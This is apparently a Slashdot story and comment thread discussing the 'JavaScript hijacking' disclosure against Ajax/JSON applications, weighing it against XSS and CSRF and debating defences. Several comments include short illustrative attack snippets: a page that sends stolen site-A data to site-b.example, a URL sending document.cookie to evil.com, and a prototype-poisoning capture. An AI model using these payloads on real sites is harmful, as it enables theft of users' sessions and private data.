
Web 2.0 Under Siege

Hemos posted about 7 years ago | from the in-dark-territory dept.

Security 170

Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'"


170 comments

XSS (2, Interesting)

Anonymous Coward | about 7 years ago | (#18574321)

So, how is this different than Javascript injection or Cross-site Scripting?

Re:XSS (5, Informative)

KDan (90353) | about 7 years ago | (#18574367)

I think the very subtle difference is that this time the calls are made using site A's public Ajax API, using site A's authentication token, but are made from a script sitting on site B. The javascript calls return with data from site A, which can then be handled by site B. XSS/JS Injection is more about injecting alien javascript onto site A to make site A call site B with the info it wants.

Daniel
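
The shape of the attack Daniel describes can be sketched as a page on site B that pulls site A's data feed in with a script tag. This is an illustrative mock-up, not any real API: the site names, endpoint, and callback parameter are all hypothetical.

```html
<!-- Hypothetical attacker page served from site B. The browser
     attaches the victim's site-A cookies to the script request,
     so the response executes here, inside site B's page. -->
<script>
  function stealData(data) {          /* attacker-defined callback */
    new Image().src = 'https://site-b.example/log?d=' +
        encodeURIComponent(JSON.stringify(data));
  }
</script>
<script src="https://site-a.example/api/contacts?callback=stealData"></script>
```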

Re:XSS (1, Interesting)

Anonymous Coward | about 7 years ago | (#18574507)

Regarding regular XSS...

XSS/JS Injection is more about injecting alien javascript onto site A ...

OK so far.

... to make site A call site B with the info it wants.

Darn, I thought it was to make site A execute code / retrieve info from the user's system, not from another site :(

Would you care to elaborate a bit?

Re:XSS (4, Informative)

KDan (90353) | about 7 years ago | (#18574817)

Sorry, I was writing this in a rush. I meant site A executes the code that was injected, retrieves the resulting data from site A, and then sends that data over to site B (or some other location). Typically this "data" is stuff like login information...

Daniel

Re:XSS (1)

jimbojw (1010949) | about 7 years ago | (#18575987)

The article makes reference to Fortify Software having "said" that they found this vulnerability. Does anyone have a link to their actual announcement?

Re:XSS (2, Funny)

Bogtha (906264) | about 7 years ago | (#18576475)

Here [fortifysoftware.com] . For future reference:

  1. Throw the words "Fortify Software" at Google.
  2. Click on the first link.
  3. Click on the prominent link in the middle of their home page.

It's really not that hard to find details. All you really need is the ability to operate a web browser, a search engine, and about thirty seconds of your time.

Re:XSS (1)

Rastafario (1083239) | about 7 years ago | (#18576757)

I don't see this vulnerability being any different from your average phishing scam. The only difference is that the entire attack can happen without the user's interaction; a visit to a malicious site is enough.
I feel that the primary responsibility still sits with the user of the web application: browsing only trusted sites is the only way you can protect yourself.
It would be nice for an AJAX developer to ensure that the users of his/her application are not vulnerable to these kinds of attacks, but until the browser community secures the use of frames and iframes (which I believe are the biggest culprits here), there is not much a developer can do.
A simple rule for the browser to follow here would be:
A secure page loaded from a URL can only rely on resources loaded from the same address. Period.

Re:XSS (3, Informative)

Cigarra (652458) | about 7 years ago | (#18574417)

So, how is this different than Javascript injection or Cross-site Scripting?
It is not. They just HAD to make it to Slashdot's front page.

Re:XSS (2, Informative)

Anonymous Coward | about 7 years ago | (#18574647)

This attack seems to be more like CSRF than XSS. You have authenticated to site A, you have a cookie to site A, you navigate to site B. In CSRF, site B performs a hidden form post to update and change information on your account. In this attack, site B performs cross site AJAX calls to steal, update, or change information on your account.

--Anonymous Coward

Vocabulary Fix (3, Funny)

Nerdfest (867930) | about 7 years ago | (#18574323)

Sadly, this is likely to do very little to stop the use of the word 'mashups'.

Re:Vocabulary Fix (0, Offtopic)

omeomi (675045) | about 7 years ago | (#18574453)

The only use of the term Mashup that I'm familiar with is the music-oriented one [wikipedia.org] ...I guess the "web 2.0" crowd needed another catchy buzzword. Hooray.

Re:Vocabulary Fix (1)

Seumas (6865) | about 7 years ago | (#18574455)

Or web 2.0.
Or AJAX.

Really, let it be the death of both. Too bad it's a couple years too late.

Re:Vocabulary Fix (3, Funny)

MikeFats (1024245) | about 7 years ago | (#18575405)

You're right - who doesn't yearn for the good old Pine and Gopher days? I spit on you AJAX and Web 2.0.

Okay, I'll be the first to ask. (5, Insightful)

Z0mb1eman (629653) | about 7 years ago | (#18574329)

How is this different from cross-site scripting?

"In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

Re:Okay, I'll be the first to ask. (5, Informative)

daviddennis (10926) | about 7 years ago | (#18574511)

This is much harder to protect against than normal XSS. Why? Because the Ajax call does not have to be executed from within the same domain.

Let's say someone wants to attack my site, amazing.com. I browse to their site, remarkable.com, and the exploit code gets loaded into my browser. Remarkable.com can post to amazing.com using AJAX and receive replies as though I were authenticated on my site, because the browser automatically sends the amazing.com cookies along when accessing an amazing.com URL. To the browser it looks fundamentally as though I was on remarkable.com and then typed the amazing.com URL into the address bar.

(Of course you could spoof the referer, but not from an existing browser session, so I think the referer can be relied on in this context.)

If this is so, then it could truly be a throbbing migraine to fix - you would have to use the HTTP referer field to verify that the site calling your Ajax code was valid.

Hope that helps. Not the cheeriest news this morning :-(, but hopefully Prototype will have some kind of fix, and life will go on.

D
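
A minimal sketch of the referer check suggested above, using the comment's own site names. The header handling is illustrative, and a reply further down notes the limits of this approach: some clients and proxies strip or forge the header.

```javascript
// Hedged sketch: reject requests whose Referer header is absent or
// from another origin. Many legitimate clients omit the header, so
// returning false here means "don't serve sensitive data", not proof
// of an attack.
function isSameOriginReferer(headers, trustedOrigin) {
  const referer = headers['referer'];
  if (!referer) return false;          // header missing or stripped
  try {
    return new URL(referer).origin === trustedOrigin;
  } catch (err) {
    return false;                      // malformed header value
  }
}
```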

Re:Okay, I'll be the first to ask. (4, Informative)

Bogtha (906264) | about 7 years ago | (#18574657)

No, that kind of thing has always been possible since the very first implementation of JavaScript. If you don't need POST, then you can even do it with plain HTML 2.0, no JavaScript.

The problem here is that JSON is a subset of JavaScript, so it is automatically parsed under the local domain's security context when it's included in a document with <script>. There are a few tricks to "hide" it even though it's already been parsed and is sitting in memory; I assume these guys have found a way around that.

Re:Okay, I'll be the first to ask. (0)

uss_valiant (760602) | about 7 years ago | (#18575659)

This is not news, and your next best AJAX implementation is only affected if it deliberately allows cross-domain calls.

As far as I understand this article - and it's very short on details - this only affects AJAX APIs / apps that are designed to be called from other domains.
Usually, an AJAX reply just contains data (XML, JSON, or another format). But if the reply is actually valid JS, e.g. a callback function call, you can include it via the script tag and invoke the returned callback to read the cross-domain reply in JS and do something with it.
See here [simonwillison.net] or here [thefutureoftheweb.com] .

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

Re:Okay, I'll be the first to ask. (4, Informative)

Bogtha (906264) | about 7 years ago | (#18575861)

this only affects AJAX APIs / apps that are designed to be called from other domains.

No, that's the vulnerability. This allows other domains to get the data when the applications don't want to share it.

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

The news here is that the "additional precautions" that most Ajax libraries take are ineffective.

Re:Okay, I'll be the first to ask. (1)

uss_valiant (760602) | about 7 years ago | (#18575985)

this only affects AJAX APIs / apps that are designed to be called from other domains.

No, that's the vulnerability. This allows other domains to get the data when the applications don't want to share it.

Bottom line: Don't expose any data / functionality through an API that allows cross-domain XHR unless you add additional precautions.

The news here is that the "additional precautions" that most Ajax libraries take are ineffective.

Where did you read this in the article? The article has no details. Or do you have another source?

Re:Okay, I'll be the first to ask. (1)

Bogtha (906264) | about 7 years ago | (#18576255)

Where did you read this in the article? The article has no details.

Are we reading the same article [cbronline.com] ? It lists vulnerable Ajax libraries. It uses GMail and webmail in general as examples of potentially vulnerable web applications. GMail and typical webmail applications aren't designed to be called from other domains in mashups.

Or do you have another source?

Here's the advisory [fortifysoftware.com] (PDF). They override the Object() constructor before calling the JSON so they can capture the data without worrying about scope.
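
The advisory's trick can be sketched roughly like this (a simplified illustration, not Fortify's actual code): poison the prototype with a setter so that property writes leak their values. In 2007-era engines, evaluating a <script>-included JSON literal triggered such setters; modern engines changed literal semantics, so this demo uses an explicit assignment to show the capture mechanism.

```javascript
// Simplified sketch of prototype poisoning (not the advisory's exact
// code). The attacker defines a setter on Object.prototype; any later
// write to that property name leaks the value.
const leaked = [];
Object.prototype.__defineSetter__('secret', function (value) {
  leaked.push(value);                 // attacker captures the value
});

// Stand-in for the victim data being materialized. In 2007-era
// engines this happened while the hijacked JSON was parsed; modern
// engines no longer invoke prototype setters for object literals,
// so we assign explicitly here.
const account = {};
account.secret = 's3cr3t-token';      // triggers the poisoned setter

delete Object.prototype.secret;       // undo the poisoning
```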

Re:Okay, I'll be the first to ask. (1)

MagicM (85041) | about 7 years ago | (#18576045)

+1 Insightful

If your AJAX implementation simply returns JSON data ({json}), there is nothing to worry about. However, if something like "parseData({json})" or "data={json}" is returned (either naively, or on purpose to support cross-domain calls), then you are vulnerable.

Makes me wonder what exactly these vulnerable AJAX toolkits are doing, and why.
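
A minimal sketch of the difference MagicM describes (the endpoint response and callback name are made up): if the response wraps the data in a function call, an attacker's page simply defines that function before including the script.

```javascript
// Sketch: a response of the form parseData({...}) hands its payload
// to whoever defined parseData() -- on an attacker's page, that's
// the attacker. eval() here stands in for a cross-site <script> tag.
let captured = null;
function parseData(obj) {
  captured = obj;                     // attacker-defined "callback"
}

const responseBody = 'parseData({"email": "victim@example.com"})';
eval(responseBody);                   // the included script executes
```

Note, though, the rebuttal that follows: an unwrapped response is not automatically safe either.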

Re:Okay, I'll be the first to ask. (1)

Bogtha (906264) | about 7 years ago | (#18576371)

If your AJAX implementation simply returns JSON data ({json}), there is nothing to worry about.

This isn't true. The example they use is overriding the Object() constructor. Keeping the JSON out of scope doesn't save you.

Re:Okay, I'll be the first to ask. (1)

MagicM (85041) | about 7 years ago | (#18576603)

Who is "they", and where do they use that example?

(Not questioning what you said, I just want to learn more.)

Re:Okay, I'll be the first to ask. (1)

MagicM (85041) | about 7 years ago | (#18576855)

Never mind. I noticed the other comment you posted in which you provide the URL. Thanks!

I beg to differ (-1, Flamebait)

Anonymous Coward | about 7 years ago | (#18574821)

Don't use AJAX. Problem solved. Your site NEEDS javascript? Why? To deliver advertising? For cute little mouseover animations? I probably would HATE your crappy site!

As number two said to number six, "Information! We want information! And by hook or by crook, we'll get it."

And if your pathetic round-edged blinkey twirley site won't work without javascript, we'll go elsewhere. I used to visit weather.com almost daily, but since they added their "interactive" maps that won't work in Firefox on Linux, I just go to one of the thousands of other places on the net to get a forecast, see the temperature, and view radar.

If you make the web insecure for me, if you make the web unusable for me, I'm stupid for visiting your site. And not all of us are stupid.

Please consider your use of AJAX. Please use javascript and Flash only where absolutely necessary - and even then, triple check to make sure it's ABSOLUTELY necessary. Stop fucking up the internet for me!

Re:Okay, I'll be the first to ask. (2, Interesting)

consumer (9588) | about 7 years ago | (#18575775)

Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer. There are some better techniques described in the Wikipedia XSRF entry.

Re:Okay, I'll be the first to ask. (2, Informative)

Anonymous Coward | about 7 years ago | (#18574535)

My thought exactly. More specifically, this sounds like a CSRF attack ( http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org] ).

Such an attack previously succeeded on Digg (in the form of a white-hat demonstration of a self-Digging website), but that vulnerability has already been patched. The description of the demo attack, which they also refer to as "session riding," is available here: http://4diggers.blogspot.com/ [blogspot.com]

Re:Okay, I'll be the first to ask. (1)

joshua (2507) | about 7 years ago | (#18575541)

I agree, I can't see what the difference is between this and CSRF.

Re:Okay, I'll be the first to ask. (2, Insightful)

michaelmalak (91262) | about 7 years ago | (#18574573)

Cross-site scripting allows a web page browsed by a socially engineered victim to be transmitted to the culprit. JavaScript hijacking is more powerful -- it allows arbitrary data stored on a server (e.g. an entire address book or even all of a user's e-mail on a webmail system) to be transmitted to the culprit.

Re:Okay, I'll be the first to ask. (1)

kestasjk (933987) | about 7 years ago | (#18575093)

XSS is a vague term, but lots of people would put "JavaScript hijacking" under the same umbrella as XSS. Your typical XSS attack involves injecting JavaScript into the target domain (this may involve social engineering the victim into going to a URL which will inject the JavaScript, e.g. http://friendly.com/?var=image.src='http://evil.com/'+document.cookie [friendly.com] ).

If you can inject the JavaScript needed to do this you can usually also get it to read webmail etc. I won't repeat the things given by others that distinguish the attack posted in TFA from a regular XSS attack.

Re:Okay, I'll be the first to ask. (1)

sottovoce (139898) | about 7 years ago | (#18575965)

This exploit is different from XSS and is not new. It's called CSRF, Cross-Site Request Forgery. Web developers have known about it for several years. It's tricky to understand and potentially very dangerous, but there are remedies.

Because the problem and remedies are somewhat abstruse, casual or uninformed developers don't always take it into consideration. I'm actually a little surprised that the vast majority of commentators here seem to be unaware of it.

References:
http://getahead.org/blog/joe/2007/01/01/csrf_attacks_or_how_to_avoid_exposing_your_gmail_contacts.html [getahead.org]
http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org]
http://www.tux.org/~peterw/csrf.txt [tux.org] (from 2001!)

YES (-1, Troll)

Anonymous Coward | about 7 years ago | (#18574359)

The moar you know!

Everything's fine as long as we're all edumacated.

XSRF (2, Interesting)

Anonymous Coward | about 7 years ago | (#18574391)

How is this different from Cross-Site Request Forgery?

http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org]

Re:XSRF (0)

Anonymous Coward | about 7 years ago | (#18574581)

+1
Sounds like XSRF. Of course you need to include auth tokens (active auth + cookie) in your AJAX requests.
Just because the request is sent to an AJAX handler doesn't mean you can drop XSRF protection used for other change requests.

Re:XSRF (1)

Qzukk (229616) | about 7 years ago | (#18574725)

It seems like the difference between this and XSRF is that this actually uses the results returned from the site, while "standard" XSRF was just hitting www.myspace.com/friend.php?addfriend=imlonely in an img tag or somewhere. ... in other words, it's just as new as "... on the internet!"

Re:XSRF (0)

Anonymous Coward | about 7 years ago | (#18574901)

The article is lacking details or a clear technical description.
We can theorize all day long, but the fact is, there is no proof of concept, and today's assumption is that XMLHttpRequest can't be used to send requests to other domains.

I don't worry until I see a proof of concept or a more detailed description.

quick! (5, Funny)

mastershake_phd (1050150) | about 7 years ago | (#18574407)

Upgrade to Web 3.0, quick!

Re:quick! (0)

Anonymous Coward | about 7 years ago | (#18575115)

Microsoft already patented that. Unless you're using Windows Server 2003 or Novell SUSE you're fucked.

That's exactly what they should do (1)

Colin Smith (2679) | about 7 years ago | (#18576365)

With Ajax, you're essentially opening up the guts of your application to the world; both the server and client side are wide open to exploitation, and neither side can trust the other. It's a security nightmare, far more difficult to secure than your regular client/server application.

Hunt them down and kill them (0, Flamebait)

sycodon (149926) | about 7 years ago | (#18574423)

...every last punkwad that attacks someone's computer systems for fun or profit.

Re:Hunt them down and kill them (-1, Flamebait)

sycodon (149926) | about 7 years ago | (#18574495)

I guess the moderator is a punkwad who enjoys breaking into people's computers.

no (0)

Anonymous Coward | about 7 years ago | (#18576601)

moderators like to fuck goats.. trust me on this one

Duh (3, Informative)

evil_Tak (964978) | about 7 years ago | (#18574465)

This has been around for (web) ages. As stated in the summary, it's used all over the place to create mashups because it's one of the only ways around the security requirement that XmlHttpRequest can only talk to the originating server.

Adobe and MS should be happy about this (-1, Flamebait)

parvenu74 (310712) | about 7 years ago | (#18574469)

Or anyone else who would have a vested interest in seeing "Web 2.0" technology fail in order that they might sell us things like Flash developer platforms or WPF(/e) to solve our Web 2.0 woes.

Mashups? (5, Funny)

Rob T Firefly (844560) | about 7 years ago | (#18574509)

'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'
So back when I made the Beastie Boys rap over the Macarena tune, [spacemutiny.com] I was really hacking the Web 2.0? And here I thought I was just assaulting eardrums and good taste...

Where's the problem? (5, Interesting)

pimterry (970628) | about 7 years ago | (#18574557)

"In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

So essentially it means that the attacker can use the authentication cookie of the user to authenticate again, and then run JavaScript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (user session IDs, etc.), store it in a variable within the JavaScript. That'll stay there until a page refresh clears variable state, and how many page refreshes occur with AJAX?

AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages. AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication.

Where's the problem? (What am i missing?)

PimTerry

Re:Where's the problem? (3, Informative)

TheSunborn (68004) | about 7 years ago | (#18574683)

The problem is your statement that "AJAX needs no continual session".

AJAX really does need sessions. Just think of Gmail. It is a single AJAX session, starting when you log in and finishing when you log out or time out.

If AJAX didn't use sessions, it would have to authenticate itself with username and password on each request it made to the server.

A better solution might be to let the AJAX application explicitly handle sessions by storing the session ID and sending it in the POST part of all its requests. But that might be a problem with the browser's history, because you would then lose your session ID if you used the back button.

Re:Where's the problem? (1)

daeg (828071) | about 7 years ago | (#18574819)

Why would it need to reauthenticate with each AJAX request? You can easily just append the session token to the end of your POST (or GET) requests. It goes over the wire in cleartext either way, and all AJAX apps should be using SSL anyway.

You don't run into this specific problem if you do that. New windows with the same domain name (e.g., gmail.com) don't share the same memory as the original window, thus it won't have the authentication token, and won't have the active cookie, either.
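
The parent's approach can be sketched like this (the parameter names are made up for illustration): keep the session token in a page variable and put it in each request body rather than relying on a cookie, so a cross-site inclusion, which cannot read the page's variables, cannot supply it.

```javascript
// Sketch: build a POST body that carries the session token explicitly
// instead of letting the browser attach it via a cookie. "sid" is an
// illustrative parameter name, not any particular app's API.
function buildAuthenticatedBody(sessionToken, params) {
  const parts = ['sid=' + encodeURIComponent(sessionToken)];
  for (const key of Object.keys(params)) {
    parts.push(encodeURIComponent(key) + '=' + encodeURIComponent(params[key]));
  }
  return parts.join('&');
}
```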

Re:Where's the problem? (0)

Anonymous Coward | about 7 years ago | (#18576713)

> You can easily just append the session token to the end of your POST (or GET) requests.

Appending the session ID to URLs you return opens you up to the simplest XSS attack of all: any link to the exploiter will hand the session ID to the attacker. It doesn't even need to be a page.

Storing it in a variable is all right, but people do hit the refresh button, so you have to give it a way to re-authenticate without requiring a new login.

Re:Where's the problem? (1)

pimterry (970628) | about 7 years ago | (#18574907)

"An better solution might be to let the AJAX application explicit handle sessions by storing the session id, and sending it in the post part of all it's requests."

That's what I meant :).

All cookies are is text that identifies your session. Since it's the JS, not the server, that checks the cookies, any request must include data to validate the session anyway. Think about it: you go to a page, it generates a cookie with your session auth data in it. The JavaScript then requests appointment data for user X. The JavaScript MUST be including some sort of validation data, or otherwise the server would just be giving out this data to anybody who requests it, assuming the JavaScript had checked the cookie. AJAX can just store it in the JavaScript, rather than reading it from the cookie on every request. It's the same stored session data (or it can be); it's just stored in a JavaScript variable rather than a cookie.

I can prove it :D. Install the Firebug extension https://addons.mozilla.org/en-US/firefox/addon/1843 [mozilla.org] into Firefox and click Console. It shows AJAX requests, including parameters. All of them have a session identifier of some sort. For example, I just tried Gmail: you get a 16-character SID (session ID, presumably) parameter sent with every request.

In summary, hell is in the cookies.

Re:Where's the problem? (2, Informative)

ergo98 (9391) | about 7 years ago | (#18574871)

But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript.

Store them in JavaScript? Huh?

It is completely normal -- across the entire industry -- to store session identifiers in cookies. There is nothing special or AJAXy about that.

Re:Where's the problem? (1)

pimterry (970628) | about 7 years ago | (#18574969)

var SessionID = "asdaszxc2130123ashsad";

Stored.

sendRequest("type='appointmentList'&SID="+SessionID);

Requested (+ auth)

Cookies complicate this. You only need them to keep data when moving between pages. But you're not moving between pages!

It's like storing stuff on HDD so it's still there next boot, vs saving to RAM. Sort of.

PimTerry.

Shirky's Law: (4, Interesting)

sakusha (441986) | about 7 years ago | (#18574613)

"Social Software is stuff that gets spammed."

The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.

Is that title sarcastic? (3, Insightful)

jeevesbond (1066726) | about 7 years ago | (#18574651)

I really hope it is. There's no such thing as Web 2.0; some arse decided to put a label on the natural progression the Web was undertaking anyway. It's annoying when authors write that some entirely new, completely re-written version of the Web is--surprisingly--vulnerable; it's the same old Web, just with some new buzzwords.

This is a vulnerability that appears only when passing JavaScript between client and server. An attacker has to get a potential victim who is logged in to a site that uses the JSON format to exchange data using AJAX to visit a page they've set up. The attacker's page can then read the data the application returns. From the article:

In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker.

So it's a known method of attack, but because it's aimed at web sites using AJAX it has to be labelled 'Web 2.0'. Ugh.

We've already seen this before (4, Interesting)

slashkitty (21637) | about 7 years ago | (#18574661)

It was reported as a problem with the Google address book. These guys just generalized the problem because they saw it in many places.

It actually could be pretty nasty. I think the only solution is to pass authentication tokens through the URL or input parameters (not through cookies).

It might be a good time to use the firefox NoScript plugin if you're not using it already. Only allow javascript on sites you trust.

They discovered this? (1, Informative)

borkus (179118) | about 7 years ago | (#18574677)

I went to an Ajax conference last fall and I'm pretty sure that presenters mentioned this vulnerability in JSON.

All AJAX applications transfer data between the webpage in the client's browser and the server. If the data is in XML, the webpage and the XML have to come from the same server. If it's JSON (JavaScript Object Notation), then they do not have to come from the same server. So, if you are sending data that depends on some kind of authentication - don't use JSON.

The JSON vulnerability comes from having your session open too long. Someone navigates to a bad site, and it accesses the active session on the target site. Shorter session timeouts help with this. You can also do some authentication in the XML request as well. And don't use JSON for data that requires authentication.

In short, if you're using AJAX for data that requires authentication, then you need to take some simple precautions.

Re:They discovered this? (1, Insightful)

Anonymous Coward | about 7 years ago | (#18574865)

What an insightful analysis, not in the least bit impeded by being so blatantly wrong. JSON is a format.

Re:They discovered this? (1, Informative)

Anonymous Coward | about 7 years ago | (#18575555)

All AJAX applications transfer data between the webpage in the client's browser and the server. If the data is in XML, the webpage and the XML have to come from the same server. If it's JSON (JavaScript Object Notation), then they do not have to come from the same server. So, if you are sending data that depends on some kind of authentication - don't use JSON.
Uhh pardon? If I return json or I return XML, or I return pain text, or I return some format of my choice, the server requesting the script will still get the result from my server, just as if you POST'ed to a form on my site. This is the same issue as a cross site request forgery, the evil domain you are visiting is relying on the request to be validated since the cookies are set on the clients machine. All they are saying is that data returned from a ajax-script can be viewed using the same CSRF attack methods, this is NOTHING NEW. If the script requires request tokens (anything that would return sensitive information, or modify user accounts etc.), DON'T store them in cookies, or you are just as vulnerable to a "standard" CSRF attack, generate the tokens for the page and pass them in post/get.

Re:They discovered this? (2, Funny)

borkus (179118) | about 7 years ago | (#18575817)

I return pain text
I so want to return pain text to certain users.

if text_body == ALL_CAPS
        return PAIN_TEXT

Re:They discovered this? (1)

beppu (32422) | about 7 years ago | (#18575777)

Please mod the parent down, because it is incorrect as the Anonymous ones have stated.

Re:They discovered this? (1)

borkus (179118) | about 7 years ago | (#18575883)

What, because you can cross-site script XML? Enlighten me.

Re:They discovered this? (1)

julesh (229690) | about 7 years ago | (#18576153)

Even if the script produces an XML result, you can still make the request using the same technique. Thus, if you have a single step method for making some potentially dangerous transaction, that transaction can be performed by an attacker. What they can't do is extract meaningful data from the result.

All of these vulnerabilities show, in my mind, that the cookie model is fundamentally flawed. Cookies should not be associated only with the domain of the server that set them, but with the pair (domain that set the cookie, domain of the page making the request). This would also incidentally stop cross-site "browser habit" tracking from being performed by people who drop an ad banner on a page.

Easy Fix (2, Funny)

Anonymous Coward | about 7 years ago | (#18574695)

Just serve up an animated cursor before any XML handshakes. This will stop the attackers from exploiting the AJAX piece.

Enough (0, Redundant)

Luscious868 (679143) | about 7 years ago | (#18574941)

"Web 2.0" is a buzzword used by those in the media who do not have a background in and/or an understanding of technology. Discuss ....

Re:Enough (3, Informative)

Anonymous Coward | about 7 years ago | (#18575367)

BBZZZT! I'll bite... "Web 2.0" is a term coined by Tim O'Reilly (of O'Reilly Media; you know, those books with the animals on the cover) as a way of classifying a new generation of web-based applications: a shift from static text and HTML to interactivity and user participation in creating the content of a site. The media picked up on it later and gave it buzzwordiness. People who do not have a background in and/or an understanding of technology assume that the media made it up.

enough semantics! (1)

chdig (1050302) | about 7 years ago | (#18575635)

Wrong. It's a buzzword used by the media to represent interactive web applications, whether they understand technology or not. It's useful because it's painfully simple, and non-techie people get the basic idea.

Given that the article was not aimed directly at web developers, but at people interested in computing in general, it's appropriate for them to use buzzwords to convey their message.

If I'm talking with another web developer, I'll get upset if he/she uses "web 2.0" in a sentence -- when it comes to my profession, I hate the word. When dealing with non-web tech savvy people, it's a helpful tool to refer to dynamic websites of the type that may have this vulnerability.

Very few news articles are ever written for the /. audience, so don't take it personally when they disregard us. And don't get upset at them for using certain words when they weren't talking to us in the first place. We may make a lot of things work, but the world doesn't revolve around ./!

Re:Enough (1)

illegalcortex (1007791) | about 7 years ago | (#18576185)

You should get the stick out of your ass. Discuss... ;)
Seriously, when they said Web 2.0, I knew what they were talking about (it's the "Under Siege" part that I felt was dumb). I knew they were talking about the JavaScript and XMLHttpRequest stuff that is frequently called AJAX (another term some people whine about). Do you even know what a buzzword is? It's something you attach to a product because it's popular, like "object oriented" or "XML" when it's irrelevant to the actual functioning of the product. Web 2.0/AJAX, on the other hand, describes web applications that function quite differently from non-Web-2.0/AJAX ones.

Re:Enough (1)

aaronoaxaca (1082897) | about 7 years ago | (#18576361)

A buzzword that goes over very well with prospective clients these days, especially since the lack of an "official" description of the technology Web 2.0 embraces, and of the new use models it allows, lets you tailor your definition to each client's desires.

Re:Enough (1)

julesh (229690) | about 7 years ago | (#18576427)

Ignorant media people and unscrupulous "consultants".

My company lost a client last year because we were realistic in telling him what we could achieve with his web site. Meanwhile, a "Web 2.0 consultant" told him that, using the power of Web 2.0, he could keep the site in the top Google spot for search terms of his choice. My former client was gullible enough to believe him.

What vulnerability? (-1, Troll)

Anonymous Coward | about 7 years ago | (#18574985)

Thank god "AJAX coders" don't do C, or we'd be in even deeper shit. They should be shot in the balls.

Blah

Leaves web to trusted sites only (1)

failedlogic (627314) | about 7 years ago | (#18575023)

I think the article is a bit exaggerated, but if the perception takes hold that "Web 2.0" is under attack, it might be a good time to look at this problem. Consider that a lot of people only surf a few websites (to get some news, etc.) and use e-mail. Most people don't use the net for anything more.

So if I only visit about 10 websites daily, and I'm reasonably sure those 10 sites are safe, why would I go anywhere else if it could cause problems for my computer? I've seen and heard from a lot of people fed up with spyware, adware and viruses. It's a waste of their time. So going to these other sites, knowing they could be infected, would also be a waste of their time (assuming they're interested in the content). If this blows up any more, or if the perception takes hold that the Internet will only get worse, it's not going to encourage people to venture much past those 10 websites.

Surprised? (1)

boxxa (925862) | about 7 years ago | (#18575113)

Is anyone actually surprised by this? It was only a matter of time: most people are using the frameworks out there, and more than half of the AJAX sites that sprang up aren't fully protected by careful coding, since it's a new technology.

Backwards quote... (1)

xxxJonBoyxxx (565205) | about 7 years ago | (#18575135)

From TFA:

Everybody thought that the rise of Ajax as a web programming model would merely exacerbate existing types of attack. Few thought it would give rise to a new class, noted (some random guy).


Actually, I'd claim that "everybody" with a toe in the security world thought the opposite: that we'd start hearing about daily or weekly Ajax security problems as a regular course of business.

(If you think various operating systems have legacy code problems, you don't know "JavaScript as implemented by browsers"...)

The Biggest WTF... (5, Funny)

Sam Legend (987900) | about 7 years ago | (#18575173)

The biggest WTF is that somebody is still using javascript. Oops. Wrong site...
(Captcha: backtotheweb1.0)

Detailed report on this problem (no reg required) (3, Informative)

robby_r (1082023) | about 7 years ago | (#18575207)

All: I encourage you to read the detailed report Fortify wrote on this topic. It's written for developers and explains the problem in clear technical detail: http://www.fortifysoftware.com/advisory.jsp [fortifysoftware.com] (no registration required). It's a long document, but I doubt you'll have many questions after reading it. It's refreshing to see reports like this that don't insult a developer's intelligence.

sigh (4, Insightful)

CrazyBrett (233858) | about 7 years ago | (#18575309)

This just sounds like a fancy Cross-Site Request Forgery.

I still maintain that the collective blindness to these security issues comes from our absolute refusal to see HTTP requests as function calls. This is partly due to the silly ideology of the REST crowd.

Rephrase the situation as follows and see if this doesn't make you pee your pants: "Any site can instruct your browser to execute an arbitrary function on another site using your authentication credentials."

Re:sigh (3, Interesting)

julesh (229690) | about 7 years ago | (#18576547)

This just sounds like a fancy Cross-Site Request Forgery.

That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.

The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.

The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want? :)
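The hijack the parent describes can be seen in miniature. The endpoint URL and response contents below are invented for illustration; the key observation is that a JSON array response is a valid JavaScript *expression*, so a `<script>` tag pointing at the endpoint executes it directly:

```javascript
// The body a vulnerable JSON endpoint might return (contents made up).
const responseBody = '[{"account":"12345","balance":100}]';

// What the browser effectively does with
//   <script src="https://bank.example/api/accounts"></script>
// on the attacker's page: evaluate the fetched body as JavaScript.
// Nothing stands between the text and live objects.
const leaked = eval(responseBody);
```

In 2007-era engines, the attacker's page could capture `leaked` by redefining the Array constructor before the script tag ran; modern engines no longer invoke a redefined `Array` for array literals, which closes that particular capture channel (but not CSRF itself).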

vulnerable == cookie && json && !p (3, Informative)

Anonymous Coward | about 7 years ago | (#18575393)

An application may be vulnerable if:

- It uses cookies to store session IDs or other forms of credentials; and
- It sends data from server to browser using "JSON" notation; and
